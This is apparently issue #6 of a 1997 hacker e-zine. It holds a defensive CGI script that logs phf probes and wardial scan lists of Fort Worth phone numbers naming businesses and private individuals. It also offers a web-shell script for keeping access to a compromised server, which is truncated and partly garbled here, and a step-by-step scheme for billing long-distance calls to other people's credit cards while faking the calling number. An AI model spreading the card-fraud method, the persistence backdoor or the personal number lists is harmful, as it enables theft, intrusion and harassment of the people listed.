_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | #0006 | | 0115.97 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward General Member Listing Phf Logger Hacking Scans 817.595.XXXX 817.572.XXXX Remote Shell Phreaking Long Distance Savings Closing ############################################################################## Foreward Okay, well, this is CAU's 6th, zine... Happy New Year... Anyway, sorry for last month's zine being kinda bare... I think most of the CAU memebers got lazy due to the fact that it was Christmas and all. Hopefully this month's zine will make up for last months. A little note on the CAU GHQ local network... the bbs machine is down due to lack of a hard drive... as soon as I get another hard drive for the bbs machine, the bbs will be back up. Also, I finally got another 14.4 USR modem for the bbs, so when it comes back up, the bbs will no longer be on the dreaded 2400bps modem. It should be back up next month sometime, and will be running under linux. Also, recently, CAU was cut to 4 members, the other members pending to be re-evaluated. This came about due to lack of involvement and no contribution to the group by the members that were cut. Almost immediately after this happened, the remaining 4 members voted to offer membership to int3l. The vote was a unanimous 'yes', and int3l accepted our offer, becoming the 5th member. Anyway, on to the zine... I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Member Listing Handle IRC Nick E-Mail -------------------------------------------------------------- I)ruid Druid_817 root@cau.psyberlink.net uv uv_ uv@cau.psyberlink.net Crimson Assassin Crimson_A crimson@cau.psyberlink.net Fizban Fizban^ fizban@ttu.edu int3l int3l proto1@computek.net -------------------------------------------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Phf Logger Okay, first off, this code was originally written by Phelix, although I modded it up more than just a little. Thanx goes to Ophie for tha help with coding. Anyway, basically, this is a little script to put in your cgi-bin directory on your web server. (I've included the actual executable script in the zip so you don't have to cut this out of the zine... hasslefree...) What this script does, is if someone sends a phf querry to your web server, it logs the date and time, who sent it, and what they querry'd for in a nice little log file. Also, it throws up a pretty little web page informing them that they have been bad, and that we know that they have been bad... (: One drawback, the logfile has to be somewhere where your web USERS uid can write to. I have my web server running as "nobody" and "nobody" has very little that they can do: therefore I put the logfile in /tmp/phflog so that "nobody" can write to it, and symlink it to /var/adm/phflog just for convienience. You can also copy this script to other meaningful names in your cgi-bin directory, such as "test-cgi" for example... then just edit everywhere that says phf to test-cgi and log everything that people send to your cgi-bin's... I)ruid --------------------------------/ CUT HERE /--------------------------------- #!/bin/sh ############################################################################# ## ## Phf Logger - ## ## Original Source by: Phelix ## Modifications by: I)ruid ## Thanx to: Ophie ## ## Put this in your httpd's cgi-bin directory... ## ############################################################################# echo Content-type: text/html echo cat << _EOF_
Query string: "$QUERY_STRING"
_EOF_
#
# Logfile must be somewhere writeable by the uid of your webserver
# ( I then symlink it to /var/adm/cgilog )
#
if [ ! -r /tmp/cgilog ] ; then
cat /dev/null > /tmp/cgilog
fi
sleep 2
cat<<%EOM% >> /tmp/cgilog
Phf attempt [`date`]
Source: $REMOTE_HOST
Querry: $QUERY_STRING
------------------------------------------------------------------------------
%EOM%
--------------------------------/ CUT HERE /---------------------------------
##############################################################################
Hacking
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Scans
==============================================================================
817.595.XXXX
-={817/595}=-Fort Worth----------------------1996----int3l--
````````````````````````````````````````````````````````````
[Number] [Owned by]
595-3572 -=Not located
595-4712 -=Not located
595-7891 Montgomery Ward and CO
595-3190 Colorado Capital Investment
595-0748 Allnet Communication svcs
595-4586 Lucas Funeral Homes
595-0726 Allied Clinical
595-0839 Stride Rite
595-6701 Tarrant Appraisal District
595-2291 Allen Samuels Dodge Truck
595-0562 Damon Clinical
595-6885 National Guardian Security
595-6193 Tarrant A D
595-4296 National Health Lab
595-2762 Jack in the box inc
595-2432 Ritz Camera one hour photo
595-1513 North Loop Dodge
595-1236 Bob Parker
595-3727 General Cinema Theaters
595-5411 Chem Lawn services corporated
595-4750 B Dalton Software etc
595-8199 North loop Dodge
595-2293 Allen Samual Dodge Truck
595-0279 Pulidos
595-0564 Franklen Quest Co
595-4382 Flight safety
595-4623 Mark E MC Easland
595-1117 T T I inc
595-4242 Attis voice
595-6894 National guardian security
595-3627 National Health Lab
595-4535 Childrens Broadcasting Corp
595-0811 Natil Guardian
595-4767 Furrs Cafeterias inc
595-5227 Sears Roebuck and co
595-4214 Tim Truman
595-0113 Walker Building corp
595-0456 Matt snider
595-9021 North Hills Medical Center
595-2600 Afco inc
595-4327 A T C O Rubber Products
595-4025 Ramada Inn
595-1185 Northeast Medical Clinic Association
595-1245 Northeast Medical Clinic Association
595-3013 A ttis
595-0143 Proficient Food co
595-0269 Whataburger Restaurants
595-4374 Whataburger
595-0503 A tandt
595-0941 James Wyatt
595-5084 H B A Richland Hospital
595-3029 Smith Kline Inc
595-5486 Flight Safety Instructional Div
595-1355 North Loop Dodge
595-3798 Alpha 3 R Service
595-4061 U A cinema
595-2272 Mr C And Son inc
595-2815 Pharmchem Laboraties inc
595-3987 Bobby R Prowell
595-6148 Tarrant Appraisale District
595-0086 Musicland group inc
595-1359 First
595-3726 First
595-8028 Code rite
595-3412 Code rite
595-8013 Code rite
595-8006 Code rite
595-8019 Code rite
595-6433 Allied Electronics
595-8527 Allied Electronics
595-6434 Allied Electronics
595-8520 Allied Electronics
595-8521 Allied Electronics
595-6427 Allied Electronics
595-1437 First
595-2918 Alan Young Buick
595-2795 Kmart Stores
595-3393 Alpha 3 r services
595-3636 Foot Locker
595-4359 American Voice Retrival
595-1747 National Health Lab
595-4386 A T T I S
595-3342 Texas State Optical
595-0918 Healthcare pharmacy services D F W : UNIX
595-4746 Con way inermodal
595-4801 Ken Nicholson
595-4033 Rkhmond screw anc co
595-2440 Monarch Paint Company
595-2247 Pharmchem Laboratories Inc
int3l
==============================================================================
817.572.XXXX
-={817/572}=-Kendale-------------------------1996----int3l--
````````````````````````````````````````````````````````````
[Number] [Owned by]
572-0697 Redi Mix Concrete Inc
572-4867 Douglas W Rhea
572-5459 Trinity Western Title Company
int3l
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Remote Shell
Allright... more shell scripts... This little shell script is one
of those "after you've busted root" types of things... Basically, it's
designed for remote access to a shell via the web. It's not really that
useful, since it runs as uid/gid of the web server, but hey, it gets the
job done. It is mainly useful for a query/response type of shell, i.e.,
send a query, read the response... it's not interactive. Well, the rest
of the info is in the script itself, so here it is:
I)ruid
--------------------------------/ CUT HERE /---------------------------------
#!/bin/sh
###############################################################################
##
## RemShel v.1.0.0 by I)ruid --=] CAU [=--
##
## Put this cgi-bin in target's cgi-bin directory for remote shell
## access as the webserver's uid. useful just in case the snoopy
## sysadmin just happens to find and del your account.
##
## syntax:
##
## http://
_EOF_
--------------------------------/ CUT HERE /---------------------------------
##############################################################################
Phreaking
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Long Distance Savings
(OP Diverting to AT&T for Free Calls)
Alright, So you wana make free calls anywere in the United States
for a savings of 100% off all long distance call's anywere Anytime! Here's
one easy method method... It Requires a CreditCard number (Extrapulate
Daddy's card if you don't have any). The card must be either a MasterCard,
American Express, or of course AT&T Calling Card..
Now, first, dial "0". You'll then get an operator. Tell her to dial
1-800-225-5288. If she asks why you can't dial it, just tell her your
phone keypad is messed up.. After she dials it for you, an AT&T operator
should come on and say, "May I have the number your calling from
please?" Give them any area code and number (not, 800s, 900s, 950s
888s)... Because, When you dialed "0" and told them to dial the number
for you it does'nt carry over your phone number, and thats why
they ask you For it.. After you give her the number your calling from
(Not the real number of course) She'll ask you what number you want to
dial. Give her the number you want to call, Anywere in the United Staes
(Works, also for about 60% of all international calls).. Now she'll ask
you for a billing method. Tell her Credit Card and give her the Card
number. Something nice about At&T is that they don't require Expiration
dates. When they ask for one you can give them ANY experation date you
damn well please, Because they don't check.. Just the Card number
"Matters".. There you go, The Most Basic way to dial Long Distace for a
Total savings of 100%....
A Couple Notes.. After you get done talking to whoever it is you
Dialed through AT&T Press the Pound Sign (#) And an automated voice will
come on and say, "You May Dial another number now".. This will works 20
times... Also, If you were transfered from "0" to AT&T and you herd an
automated system Saying,"Please, enter your calling card number or Credit
card number now" Then, That means it does'nt work for your Area,.. So, don't
do it! (RARE).. This is also a way of diverting your Call in case you
want you want to prank call the FBI or something else,.. When *69 is
Pressed they will get the person whose number you gave the Operater when
she Asked For the number your calling from. Also this works for caller ID...
Another Note, When you asked your Local "0" operator to Dial a number
for you aside from an 800 you WILL get charged about $1.20 each time.
You are NOT however Charged for when 800 Numbers are dialed.. Another
Number for 800-225-5288 (800-CALL-ATT) is 800-321-0288....
int3l
##############################################################################
Closing
Allright, well, i think this zine is better than the last one,
but still not where I would like it to be. This next month, I plan to
work at least an hour a day for the full month on #7, and we'll see where
that gets the zine by the 15th of next month... see ya then!
I)ruid
##############################################################################
____ ____ __ __
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground
$RESPONSE